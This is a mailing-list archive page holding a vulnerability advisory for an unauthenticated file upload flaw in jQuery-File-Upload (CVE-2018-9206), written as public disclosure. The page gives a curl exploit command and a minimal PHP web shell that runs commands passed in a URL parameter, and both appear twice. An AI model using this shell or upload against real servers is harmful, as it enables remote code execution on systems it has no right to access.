[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] =?utf-8?B?alF1ZXJ5LUZpbGUtVXBsb2FkIDw9IHY5LjIyLjAgdW5hdXRoZW50aWNhdGVk?=
From: "Larry W. Cashdollar" <larry0 () me ! com>
Date: 2018-10-11 16:06:21
Message-ID: 70dba524-20af-4af3-9c45-698d762e1a4a () me ! com
[Download RAW message or body]
Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-09
CVE-ID:[CVE-2018-9206]
Download Site: https://github.com/blueimp/jQuery-File-Upload/
Vendor: https://github.com/blueimp
Vendor Notified: 2018-10-09
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=204
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, \
validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and \
resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, \
Ruby on Rails, Java, etc.) that supports standard HTML form file uploads. Vulnerability:
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php \
doesn't require any validation to upload files to the server. It also doesn't exclude file \
types. This allows for remote code execution.
Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
Where shell.php is:
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
Screen Shots:
Notes: Actively being exploited in the wild. \
https://github.com/blueimp/jQuery-File-Upload/pull/3514
[Attachment #3 (multipart/related)]
[Attachment #5 (unknown)]
<html><body><div>Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload \
vulnerability<br>Author: Larry W. Cashdollar, @_larry0<br>Date: \
2018-10-09<br>CVE-ID:[CVE-2018-9206]<br>Download Site: \
https://github.com/blueimp/jQuery-File-Upload/<br>Vendor: https://github.com/blueimp<br>Vendor \
Notified: 2018-10-09<br>Vendor Contact:<br>Advisory: \
http://www.vapidlabs.com/advisory.php?v=204<br>Description: File Upload widget with multiple \
file selection, drag&drop support, progress bar, validation and preview images, audio and \
video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any \
server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports \
standard HTML form file uploads.<br>Vulnerability:<br>The code in \
https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't \
require any validation to upload files to the server. It also doesn't exclude file types. This \
allows for remote code execution.<br><br><br>Exploit Code:<br>$ curl -F "files=@shell.php" \
http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php<br> <br>Where shell.php is:<br> \
<br><?php </div><div>$cmd=$_GET['cmd']; </div><div>system($cmd);</div><div>?><br>Screen \
Shots:<br>Notes: Actively being exploited in the wild. \
https://github.com/blueimp/jQuery-File-Upload/pull/3514</div></body></html>
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic